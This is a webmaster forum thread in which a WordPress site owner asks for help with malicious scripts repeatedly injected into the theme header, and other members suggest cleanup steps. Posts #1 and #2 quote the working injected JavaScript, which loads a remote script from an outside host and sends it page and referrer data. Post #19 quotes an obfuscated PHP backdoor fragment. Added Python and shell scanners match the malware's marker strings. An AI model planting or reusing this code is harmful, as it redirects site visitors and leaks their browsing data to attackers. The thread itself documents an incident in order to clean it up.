Scripts inserted in my WP themes header

  • ravenazrael
    Confirmed User
    • Nov 2011
    • 590

    #1

    Scripts inserted in my WP themes header

    Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
    I changed themes 3 times, got hosting to scan for the malware, which they did and deleted, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample.
    How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.

    <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
    www.boobsrealm.com
    www.bestboobscams.com
  • Brian mike
    #Alberta51
    • Oct 2014
    • 8735

    #2
    Originally posted by ravenazrael
    Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
    I changed themes 3 times, got hosting to scan for the malware, which they did and deleted, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample.
    How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.

    <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
    Do you use an ad network? I mean, are you a publisher? This could be the way they get into your site.
    Without accusing any company, you should look into this too.
    Tube - Cam - Escorts - Top List
    Menu Tab - Banner - Header Link - Blog Post
    DM me

    • Fetish Gimp
      Confirmed User
      • Feb 2005
      • 1699

      #3
      I would suggest:
      • Make sure you're running updated Wordpress installations, and that all your plugins are updated.
      • If you're running any plugins that are not from the Wordpress repository, disable them. Enable them one at a time and check to see if the malicious code comes back.
      • Check that all Wordpress users with admin privileges are ones you know should exist, and change their passwords just in case.
      • Change your FTP user/passwords.


      Check out these links on making Wordpress more secure:
      https://codex.wordpress.org/Hardening_WordPress
      Securing WordPress: Hardening Basics | The State of Security
      https://www.wordfence.com/learn/how-...rdpress-sites/
      Strapon Seduction - femdom blog | Twitter

      • ravenazrael
        Confirmed User
        • Nov 2011
        • 590

        #4
        Thanks. Everything started when I used an ad network's script months ago, then stopped, then cleaned the whole site, but it has been returning many, many times.

        All plugins are from the WP repository. The problem is that the issue happens every day or every two days, so running without a plugin per day as a test may end like next year and still it may harm the website.
        The 3 admins are me and the developers I had to hire to fix the issue. No one else has logged in to the site as admin in the past weeks.

        Is there a way to block scripts?

        • Brian mike
          #Alberta51
          • Oct 2014
          • 8735

          #5
          Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc... if anything looks similar?
          Many think those are legit outbound but THEY ARE NOT. I mean we have discovered a hacked file with the above URL or similar.

          Also check the webmaster tools USER owner property, if anyone new has been added as owner. Been hacked this way before.

          • ravenazrael
            Confirmed User
            • Nov 2011
            • 590

            #6
            Originally posted by Brian mike
            Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc... if anything looks similar?
            Many think those are legit outbound but THEY ARE NOT. I mean we have discovered a hacked file with the above URL or similar.

            Also check the webmaster tools USER owner property, if anyone new has been added as owner. Been hacked this way before.
            nope, none of them show anything

            • Colmike9
              (>^_^)b
              • Dec 2011
              • 7230

              #7
              Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
              Join the BEST cam affiliate program on the internet!
              I've referred over $1.7mil in spending this past year, you should join in.
              I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

              • ravenazrael
                Confirmed User
                • Nov 2011
                • 590

                #8
                Originally posted by Colmike7
                Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
                I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?

                • Brian mike
                  #Alberta51
                  • Oct 2014
                  • 8735

                  #9
                  Originally posted by ravenazrael
                  I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?
                  Talk to Roby http://gfy.com/business-services/122...l#post21246502

                  At this point if your tech can't fix it try another one mate. Or worst case change Theme.

                  Good Luck and keep us posted

                  • Colmike9
                    (>^_^)b
                    • Dec 2011
                    • 7230

                    #10
                    Originally posted by ravenazrael
                    I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?
                    I have one way to block the script without removing it, but it's stupid so I won't post it..


                    Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri.

                    Hope this helps.

                    • Brian mike
                      #Alberta51
                      • Oct 2014
                      • 8735

                      #11
                      Colmike your link is VIrusssssssssssss

                      DON'T CLICK THIS LINK, see below why


                      • Colmike9
                        (>^_^)b
                        • Dec 2011
                        • 7230

                        #12
                        Originally posted by Brian mike
                        Colmike your link is VIrusssssssssssss

                        DON'T CLICK THIS LINK, see below why

                        I removed it, but that was just sucuri.net showing the malware in plain text.

                        • ravenazrael
                          Confirmed User
                          • Nov 2011
                          • 590

                          #13
                          ok thanks.. will let you know if something of this works out

                          • Google Expert
                            Webmaster
                            • Jun 2004
                            • 14294

                            #14
                            We used to have exactly the same thing. Even managed to track the fucking Russian down to his home address.

                            We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

                            They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.

                            • ravenazrael
                              Confirmed User
                              • Nov 2011
                              • 590

                              #15
                              Originally posted by Google Expert
                              We used to have exactly the same thing. Even managed to track the fucking Russian down to his home address.

                              We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

                              They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.
                              thanks. I'll need to get someone to do that.

                              • Bama
                                Confirmed User
                                • Nov 2001
                                • 2727

                                #16
                                If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.

                                • Relic
                                  So Fucking Banned
                                  • Aug 2002
                                  • 10300

                                  #17
                                  That's what you get not keeping software up to date, op.

                                  • PornAffiliate
                                    Affiliate
                                    • Feb 2008
                                    • 247

                                    #18
                                    You probably already have tried some malware plugins - but if you haven't tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
                                    Porn Affiliate Programs - The Best Affiliate Programs & Some Webmaster Resources Like Free WP Themes.

                                    • ravenazrael
                                      Confirmed User
                                      • Nov 2011
                                      • 590

                                      #19
                                      Thanks guys and thanks for the recommendations.
                                      As I am not tech savvy and the person helping me is MIA, I tried to find the issue myself.
                                      What is the dirs.php file supposed to do?
                                      I think that is one of the issues. It has crap like this one:
                                      ${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));

                                      • ravenazrael
                                        Confirmed User
                                        • Nov 2011
                                        • 590

                                        #20
                                        What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
                                        http://www.boobsrealm.com/wp-content.../wordfence.png

                                        • Fetish Gimp
                                          Confirmed User
                                          • Feb 2005
                                          • 1699

                                          #21
                                          Originally posted by ravenazrael
                                          What is the dirs.php file supposed to do?
                                          I think that is one of the issues. It has crap like this one:
                                          ${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
                                          Wordpress itself does not have any such file.

                                          If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised.

                                          I would suggest trying this, in this order:
                                          1. Change all your server-related user/passwords (ftp/cpanel, ssh)
                                          2. Change all your Wordpress passwords
                                          3. Delete the dirs.php file you found


                                          If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server.

                                          • Colmike9
                                            (>^_^)b
                                            • Dec 2011
                                            • 7230

                                            #22
                                            Originally posted by ravenazrael
                                            What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
                                            http://www.boobsrealm.com/wp-content.../wordfence.png
                                            Probably a bot checking sites for backdoors and/or other vulnerabilities..

                                            There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.

                                            • lezinterracial
                                              Confirmed User
                                              • Jul 2012
                                              • 3117

                                              #23
                                              Originally posted by ravenazrael
                                              What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
                                              http://www.boobsrealm.com/wp-content.../wordfence.png
                                              That doesn't look malicious to me. Looks like your css in your theme is looking for a font that is in your theme that it can't find.

                                              I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0" if you want to fix this error. You may want to look for your hack though.



                                              Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated.

                                              Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password?

                                              I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.
                                              Live Sex Shows
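
The checks suggested in posts #10, #21 and #23 (fake file names, PHP inside the uploads folder, obfuscated PHP shaped like the dirs.php excerpt, and when a file was last changed) can be run in one pass over the WordPress directory. This is an added example, not code from any poster; the demo tree, reason labels and function names are constructed for illustration, and every match is a heuristic to review by hand.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Strings from the sample in post #1: the cookie name and the fake jQuery loader path.
LOADER_STRINGS = ("__cfgoid", "jquery.min.php")
# File names the thread flags as not belonging to WordPress (posts #10 and #19).
SUSPECT_NAMES = {"jquery.min.php", ".ftpquote", "dirs.php"}
# Shape of the dirs.php excerpt in post #19: ${Name("...")} variable-variables.
OBFUSCATED_CALL = re.compile(r'\$\{\s*[A-Za-z_]\w*\s*\(\s*"')
TEXT_EXT = {".php", ".phtml", ".js", ".html", ".htm"}
PHP_EXT = {".php", ".phtml"}


def classify(rel_path, text):
    """Return the reasons a file looks suspicious; an empty list means no match."""
    name = os.path.basename(rel_path).lower()
    ext = os.path.splitext(name)[1]
    reasons = []
    if name in SUSPECT_NAMES:
        reasons.append("suspect-name")
    if "/uploads/" in "/" + rel_path and ext in PHP_EXT:
        reasons.append("php-in-uploads")
    if any(s in text for s in LOADER_STRINGS):
        reasons.append("loader-string")
    if ext in PHP_EXT and OBFUSCATED_CALL.search(text):
        reasons.append("obfuscated-call")
    return reasons


def scan_tree(root):
    """Walk root and return [(rel_path, reasons, mtime_utc)], newest change first."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            text = ""
            if os.path.splitext(fname)[1].lower() in TEXT_EXT:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            reasons = classify(rel, text)
            if reasons:
                hits.append((rel, reasons, os.path.getmtime(full)))
    # Newest first: the file rewritten most recently is where re-infection shows up.
    hits.sort(key=lambda h: h[2], reverse=True)
    return [(rel, why,
             datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"))
            for rel, why, ts in hits]


def build_demo_tree():
    """Create a constructed WordPress-like tree (sample data, not from a real site)."""
    root = tempfile.mkdtemp(prefix="wp-demo-")
    base = 1_700_000_000  # arbitrary epoch used to give the files distinct mtimes
    files = {
        "wp-content/themes/demo/header.php":
            ('<head><script>null==getCookie("__cfgoid")&&go()</script></head>', base + 300),
        "wp-content/themes/demo/footer.php": ("<?php wp_footer(); ?>", base),
        "wp-content/uploads/2016/01/thumb.php": ("<?php /* constructed */ ?>", base + 200),
        "wp-content/uploads/2016/01/photo.jpg": ("", base),
        "dirs.php": ('<?php ${Abc("x")} = ${Def("y")}(array()); ?>', base + 100),
        ".ftpquote": ("", base + 50),
    }
    for rel, (body, mtime) in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(full, (mtime, mtime))
    return root


if __name__ == "__main__":
    for rel, why, when in scan_tree(build_demo_tree()):
        print(f"{when}  {rel}  {', '.join(why)}")
```

Running it on a schedule and comparing the newest timestamps against the web server access log narrows down which request rewrites the header.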

                                              • jscott
                                                jscizzle
                                                • Feb 2001
                                                • 25412

                                                #24
                                                ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.

                                                https://aw-snap.info/file-viewer/
                                                I found this online website scanning tool very helpful

                                                This is a terrible, terrible thing. Good luck getting it fixed.
                                                “If you think tough men are dangerous, wait until you see what weak men are capable of.”
                                                —Jordan B. Peterson

                                                Listen to Pomp tell why is Bitcoin important

                                                • ravenazrael
                                                  Confirmed User
                                                  • Nov 2011
                                                  • 590

                                                  #25
                                                  Thanks to everybody!
                                                  Yes, it has been hitting me for months and it looked normal for a while. My traffic has gone to 1/3 now.

                                                  • just a punk
                                                    So fuckin' bored
                                                    • Jun 2003
                                                    • 32393

                                                    #26
                                                    Originally posted by Bama
                                                    If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
                                                    According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
                                                    Obey the Cowgod

                                                    • ravenazrael
                                                      Confirmed User
                                                      • Nov 2011
                                                      • 590

                                                      #27
                                                      Originally posted by CyberSEO
                                                      According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
                                                      All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(

                                                      • Brian mike
                                                        #Alberta51
                                                        • Oct 2014
                                                        • 8735

                                                        #28
                                                        Originally posted by ravenazrael
                                                        All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(
                                                        Blame Donald Trump (joke aside, trying to make you smile for 5 sec.). I feel you mate, do you think it's time to wipe out?

                                                        I have my part of problems also, moving server is a bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

                                                        At least you know where the problem comes from, I suggest you TAKE big action to wipe it out.

                                                        • ravenazrael
                                                          Confirmed User
                                                          • Nov 2011
                                                          • 590

                                                          #29
                                                          Originally posted by Brian mike
                                                          Blame Donald Trump (joke aside, trying to make you smile for 5 sec.). I feel you mate, do you think it's time to wipe out?

                                                          I have my part of problems also, moving server is a bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

                                                          At least you know where the problem comes from, I suggest you TAKE big action to wipe it out.
                                                          by wipe out you mean the whole site and content?? =(

                                                          • Fetish Gimp
                                                            Confirmed User
                                                            • Feb 2005
                                                            • 1699

                                                            #30
                                                            Originally posted by ravenazrael
                                                            by wipe out you mean the whole site and content?? =(
                                                            I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

                                                            One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.

                                                            • ravenazrael
                                                              Confirmed User
                                                              • Nov 2011
                                                              • 590

                                                              #31
                                                              Originally posted by Fetish Gimp
                                                              I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

                                                              One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
                                                              thanks. well that was done before... two months ago.. and the problem persisted

                                                              • ravenazrael
                                                                Confirmed User
                                                                • Nov 2011
                                                                • 590

                                                                #32
                                                                seems it is finally solved. thanks to you all!

                                                                • jscott
                                                                  jscizzle
                                                                  • Feb 2001
                                                                  • 25412

                                                                  #33
                                                                  oh it's never solved

                                                                  • klinton
                                                                    So Fucking Banned
                                                                    • Apr 2003
                                                                    • 8766

                                                                    #34
                                                                    so how did you fix it?
                                                                    Originally posted by ravenazrael
                                                                    seems it is finally solved. thanks to you all!


                                                                    • PornDiscounts-V
                                                                      Confirmed User
                                                                      • Oct 2003
                                                                      • 5744

                                                                      #35
                                                                      They may likely have made many backdoor shells. Best bet is to format, then import only posts from old database on fresh install.

                                                                      • MichaelA2014
                                                                        Registered User
                                                                        • Oct 2014
                                                                        • 9

                                                                        #36
                                                                        Back up only post content and images. Nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.


                                                                        • j3rkules
                                                                          VIP
                                                                          • Jul 2013
                                                                          • 22111

                                                                          #37
                                                                          Originally posted by klinton
                                                                          so how did you fix it?
                                                                          I am also curious after reading all of this.


                                                                          • Google Expert
                                                                            Webmaster
                                                                            • Jun 2004
                                                                            • 14294

                                                                            #38
                                                                            Originally posted by ravenazrael
                                                                            all plugins were downloaded from the WP repository... files were cleared... but script returned again =(
                                                                            I already told you. The script infected all your server.

                                                                            You need to format the HDD and do a clean OS install.

                                                                            Other than this, nothing will help.


                                                                            • Paz
                                                                              Confirmed User
                                                                              • Jun 2012
                                                                              • 457

                                                                              #39
                                                                              Originally posted by Google Expert
                                                                              I already told you. The script infected all your server.

                                                                              You need to format the HDD and do a clean OS install.

                                                                              Other than this, nothing will help.
                                                                              This isn't true. You can update plugins and themes, run malware scanners and update all your passwords, then install a Better Security plugin. It's a pain but much quicker than a format and clean install.


                                                                              • ravenazrael
                                                                                Confirmed User
                                                                                • Nov 2011
                                                                                • 590

                                                                                #40
                                                                                Originally posted by Paz
                                                                                This isn't true. You can update plugins and themes, run malware scanners and update all your passwords, then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
                                                                                yep.. that is what worked.. so far
                                                                                I actually never downloaded any plugin or script from BHW. I remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was a coincidence.

                                                                                • ErectMedia
                                                                                  Confirmed Chicago Pimp
                                                                                  • Aug 2004
                                                                                  • 7100

                                                                                  #41
                                                                                  Basics....

                                                                                  https://ithemes.com/2016/10/13/how-t...ly-and-easily/

                                                                                  Good plugin...

                                                                                  https://wordpress.org/plugins/all-in...-and-firewall/

                                                                                  If that doesn't do it, you could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare is more popular and a good CDN, but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan.


                                                                                  • Shoplifter
                                                                                    Richest man in Babylon
                                                                                    • Jan 2002
                                                                                    • 5846

                                                                                    #42
                                                                                    It is possible to clean out a hacked Wordpress setup and indeed I have done it.

                                                                                    One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls

                                                                                    It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server.

                                                                                    If the attacker is using your site to send spam emails, it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going: one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days, and once you can wrap your head around what they are trying to do it's a lot easier to prevent it.

                                                                                    It can also help if you use something like Wordfence, which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes.

                                                                                    Comment
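The file-level checks suggested in post #42, as an added example that is not part of any poster's message: it combines the `find ... -mtime -2` listing with a search for strings from the injected snippet quoted in the first post (`__cfgoid`, `jquery.min.php`). The function names, the check for PHP files under `wp-content/uploads` and the demo tree are assumptions made for this illustration; the demo files are constructed sample data.

```shell
#!/bin/sh
# Added example: file-level triage of a WordPress tree after a header injection.
# Strings that appear in the injected snippet quoted in the first post.
MARKERS='__cfgoid|jquery\.min\.php'

# recent_files ROOT [DAYS]: regular files modified in the last DAYS days (default 2).
recent_files() {
    find "$1" -type f -mtime "-${2:-2}" -print | sort
}

# marker_files ROOT: files whose content matches one of the marker strings.
marker_files() {
    grep -rlE -- "$MARKERS" "$1" 2>/dev/null | sort
}

# upload_php ROOT: PHP files under wp-content/uploads. Assumption: the site
# keeps only media there, so any PHP file in it deserves a manual look.
upload_php() {
    [ -d "$1/wp-content/uploads" ] || return 0
    find "$1/wp-content/uploads" -type f \( -name '*.php' -o -name '*.phtml' \) -print | sort
}

# triage ROOT [DAYS]: print all three lists for review; nothing is deleted.
triage() {
    printf '== modified in the last %s days ==\n' "${2:-2}"; recent_files "$1" "${2:-2}"
    printf '== contains injected-script markers ==\n';      marker_files "$1"
    printf '== PHP inside uploads ==\n';                    upload_php "$1"
}

# make_demo_tree: builds a constructed sample tree (not files from the thread)
# and prints its path. Two files are back-dated so they look untouched.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/wp-content/themes/demo" "$d/wp-content/uploads/2016"
    printf '<?php // clean file\n' > "$d/wp-content/themes/demo/footer.php"
    printf '<script>null==getCookie("__cfgoid")</script>\n' > "$d/wp-content/themes/demo/header.php"
    printf '<?php // stand-in for a dropped file\n' > "$d/wp-content/uploads/2016/cache.php"
    printf 'not really an image\n' > "$d/wp-content/uploads/2016/photo.jpg"
    touch -t 202001010000 "$d/wp-content/themes/demo/footer.php" "$d/wp-content/uploads/2016/photo.jpg"
    printf '%s\n' "$d"
}

# Usage: sh triage.sh /pathtoyourfiles/yourblog.com [days]
if [ "$#" -gt 0 ]; then triage "$@"; fi
```

A file that shows up in more than one list is the first to inspect; a clean marker search on disk does not cover copies stored in the database.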

                                                                                    • ravenazrael
                                                                                      Confirmed User
                                                                                      • Nov 2011
                                                                                      • 590

                                                                                      #43
                                                                                      thank you! I hope all this also helps somebody else who may have similar issues in the future

                                                                                      • Google Expert
                                                                                        Webmaster
                                                                                        • Jun 2004
                                                                                        • 14294

                                                                                        #44
                                                                                        Originally posted by Paz
                                                                                        This isn't true. You can update plugins and themes, run malware scanners and update all your passwords, then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
                                                                                        Do you understand that he injected the code everywhere outside the WordPress?

                                                                                        We had spent 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS.

                                                                                        P.S.
                                                                                        They also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages.
